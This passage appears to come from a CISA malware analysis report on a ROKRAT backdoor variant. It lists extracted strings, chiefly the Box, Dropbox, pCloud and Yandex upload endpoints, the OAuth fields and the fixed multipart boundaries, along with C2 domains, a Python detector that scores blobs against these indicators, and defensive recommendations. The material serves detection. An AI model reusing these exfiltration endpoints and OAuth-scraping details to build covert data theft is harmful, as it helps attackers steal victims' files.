e200517ab9... Contained_Within e1546323dc746ed2f7a5c973dcecc79b014b68bdd8a6230239283b4f775f4bbd
Description

This file has been identified as a variant of the malware known as ROKRAT and was obtained by extracting it from the file e1546323dc746ed2f7a5c973dcecc79b014b68bdd8a6230239283b4f775f4bbd.



Displayed below are strings of interest extracted from this variant of ROKRAT.



--Begin Strings of Interest--

Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36

access_token

authorization_code

bearer

client_id

client_secret

code

expires_in

grant_type

redirect_uri

refresh_token

response_type

scope

state

token

token_type

access_token

authorization_code

bearer

client_id

client_secret

code

expires_in

grant_type

redirect_uri

refresh_token

response_type

scope

state

token

token_type

Accept

Accept-Charset

Accept-Encoding

Accept-Language

Accept-Ranges

Age

Allow

Authorization

Cache-Control

Connection

Content-Encoding

Content-Language

Content-Length

Content-Location

Content-MD5

Content-Range

Content-Type

Content-Disposition

Date

ETag

Expect

Expires

From

Host

If-Match

If-Modified-Since

If-None-Match

If-Range

If-Unmodified-Since

Last-Modified

Location

Max-Forwards

Pragma

Proxy-Authenticate

Proxy-Authorization

Range

Referer

Retry-After

Server

Trailer

Transfer-Encoding

Upgrade

User-Agent

Vary

Via

Warning

WWW-Authenticate

Cookie

Set-Cookie

text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

en-US,en;q=0.8

Bearer

http://127.0.0.1/

https://api.box.com/oauth2/token

https://account.box.com/api/oauth2/authorize

https://api.box.com/2.0/folders/%s/items

GET

entries

etag

name

sequence_id

type

folder

file

POST

201

409

DELETE

204

https://api.box.com/2.0/files/%s/content

200

https://api.box.com/2.0/files/%s

https://api.box.com/2.0/files/%s/trash

https://upload.box.com/api/2.0/files/content

--opxer--

Content-Disposition: form-data; name="attributes"

"}}

", "parent":{"id":"

{"name":"

Content-Disposition: form-data; name="file"; filename="

Content-Type: video/dat

multipart/form-data;boundary=--opxer--

error

sha1

description

created_at

modified_at

size

https://api.box.com/2.0/folders/%s

Error

var request_token = '

max-age=0

<input type="hidden" name="ic" value="

<input type="hidden" name="state" value="

<form action="

box_visitor_id=

bv=

cn=

site_preference=

302

vector<T> too long

invalid string position

string too long

Aapplication/json

path

https://api.dropboxapi.com/2/files/delete

https://content.dropboxapi.com/2/files/upload

application/octet-stream

{"path":"%s","mode":{".tag":"overwrite"}}

{"path":"%s"}

Dropbox-API-Arg

https://content.dropboxapi.com/2/files/download

Ahttps://api.pcloud.com/oauth2_token

https://my.pcloud.com/oauth2/authorize

https://api.pcloud.com/uploadfile?path=%s&filename=%s&nopartial=1

--wwjaughalvncjwiajs--

Content-Type: voice/mp3

multipart/form-data;boundary=--wwjaughalvncjwiajs--

fileids

https://api.pcloud.com/getfilelink?path=%s&forcedownload=1&skipfilename=1

hosts

https://%s%s

https://api.pcloud.com/deletefile?path=%s

true

%s/%s

OAuth

PUT

href

https://cloud-api.yandex.net/v1/disk/resources?path=%s&permanently=%s

false

202

https://cloud-api.yandex.net/v1/disk/resources/upload?path=%s&overwrite=%s

method

https://cloud-api.yandex.net/v1/disk/resources/download?path=%s

--End Strings of Interest--
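Read as a group, the strings above describe a backdoor that talks only to Box, Dropbox, pCloud and Yandex Disk over HTTPS, completes OAuth itself (token endpoints, a loopback redirect_uri, and the Box login-form fields it scrapes), and uploads files as multipart bodies with fixed boundaries and made-up MIME types. Any single URL is legitimate, so a useful signature keys on several of these families appearing together. The script below is an added example, not a CISA signature: it groups the report's strings into independent indicator families and flags a blob only when several co-occur, the logic a YARA rule with an "N of ($family*)" condition expresses. It runs over either an unpacked binary or decrypted HTTP traffic; both sample blobs are constructed for the demonstration.

```python
"""Score a byte blob against the ROKRAT strings-of-interest by indicator family.

Added example, not a CISA signature. Both sample blobs are constructed; the
indicator strings are the ones listed in the report.
"""

FAMILIES: dict[str, list[bytes]] = {
    # Cloud-storage upload/download endpoints abused for C2 and exfiltration.
    "cloud_api": [
        b"https://api.box.com/2.0/files/%s/content",
        b"https://upload.box.com/api/2.0/files/content",
        b"https://content.dropboxapi.com/2/files/upload",
        b"https://api.pcloud.com/uploadfile?path=%s&filename=%s&nopartial=1",
        b"https://cloud-api.yandex.net/v1/disk/resources/upload?path=%s&overwrite=%s",
    ],
    # OAuth token endpoints plus the loopback redirect_uri.
    "oauth": [
        b"https://api.box.com/oauth2/token",
        b"https://api.pcloud.com/oauth2_token",
        b"http://127.0.0.1/",
    ],
    # Fields pulled out of the Box login page to drive the OAuth flow without a browser.
    "box_form_scrape": [
        b"var request_token = '",
        b'<input type="hidden" name="ic" value="',
        b'<input type="hidden" name="state" value="',
    ],
    # Hard-coded multipart boundaries.
    "boundary": [b"--opxer--", b"--wwjaughalvncjwiajs--"],
    # Bogus MIME types on the uploaded part.
    "mime": [b"Content-Type: video/dat", b"Content-Type: voice/mp3"],
    # Hard-coded browser User-Agent.
    "user_agent": [b"Chrome/53.0.2785.116 Safari/537.36"],
}


def match_families(blob: bytes) -> dict[str, list[bytes]]:
    """Map each family to the strings from it present in blob (empty families omitted)."""
    found: dict[str, list[bytes]] = {}
    for family, strings in FAMILIES.items():
        present = [s for s in strings if s in blob]
        if present:
            found[family] = present
    return found


def is_rokrat_like(blob: bytes, min_families: int = 3) -> bool:
    """Verdict: at least min_families independent families must co-occur."""
    return len(match_families(blob)) >= min_families


# Constructed stand-in for the strings section of an unpacked sample.
SAMPLE_BINARY = b"\x00".join([
    b"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36",
    b"http://127.0.0.1/", b"https://api.box.com/oauth2/token",
    b"https://upload.box.com/api/2.0/files/content",
    b"https://content.dropboxapi.com/2/files/upload",
    b"--opxer--", b"Content-Type: video/dat",
    b"var request_token = '", b'<input type="hidden" name="ic" value="',
])

# Constructed upload request as it would look after TLS termination.
SAMPLE_TRAFFIC = (
    b"POST /api/2.0/files/content HTTP/1.1\r\n"
    b"Host: upload.box.com\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36\r\n"
    b"Authorization: Bearer REDACTED\r\n"
    b"Content-Type: multipart/form-data;boundary=--opxer--\r\n\r\n"
    b"----opxer--\r\n"
    b'Content-Disposition: form-data; name="attributes"\r\n\r\n'
    b'{"name":"a.dat", "parent":{"id":"0"}}\r\n'
    b"----opxer--\r\n"
    b'Content-Disposition: form-data; name="file"; filename="a.dat"\r\n'
    b"Content-Type: video/dat\r\n\r\n"
    b"<collected data>\r\n----opxer----\r\n"
)

# Constructed benign blob: a legitimate Box client mentions the same API.
BENIGN_BLOB = (b"https://api.box.com/2.0/files/%s/content\x00"
               b"multipart/form-data; boundary=----WebKitFormBoundary\x00"
               b"Mozilla/5.0 (Windows NT 10.0) Chrome/96.0.4664.45 Safari/537.36")


if __name__ == "__main__":
    for name, blob in (("binary", SAMPLE_BINARY), ("traffic", SAMPLE_TRAFFIC), ("benign", BENIGN_BLOB)):
        print(name, is_rokrat_like(blob), sorted(match_families(blob)))
```

Two caveats when deploying this. Every endpoint in the list is HTTPS, so the traffic-side match only works behind a TLS-inspecting proxy or on endpoint telemetry; on the network you are otherwise limited to noticing that a Wscript.exe process is talking to four consumer cloud-storage services. On the host side, run it over memory dumps or the extracted payload rather than the loader: the loader (entropy 7.87) carries the payload encoded, which is why the strings only appear in the 520,704-byte image (entropy 6.56) extracted from it.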

Relationship Summary

3b1395f620... Contains 851b7b044cbcaa67350aff80a5b9fb4c63393957f3d4b30005a83348fe69ac5a
851b7b044c... Contained_Within 3b1395f620e428c5f68c6497a2338da0c4f749feb64e8f12e4c5b1288cc57a1c
851b7b044c... Connected_To www.korea-tax.info
www.korea-tax.info Connected_From 851b7b044cbcaa67350aff80a5b9fb4c63393957f3d4b30005a83348fe69ac5a
fec71b8479... Connected_To www.1588-2040.co.kr
www.1588-2040.co.kr Connected_From fec71b8479f3a416fa58580ae76a8c731c2294c24663c601a1267e0e5c2678a0
e1546323dc... Contains e200517ab9482e787a59e60accc8552bd0c844687cd0cf8ec4238ed2fc2fa573
e200517ab9... Contained_Within e1546323dc746ed2f7a5c973dcecc79b014b68bdd8a6230239283b4f775f4bbd

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
  • Monitor users' web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, "Guide to Malware Incident Prevention & Handling for Desktops and Laptops".

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or soc@us-cert.gov.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.us-cert.gov.

Revisions

May 12, 2020: Initial version

This product is provided subject to this Notification and this Privacy & Use policy.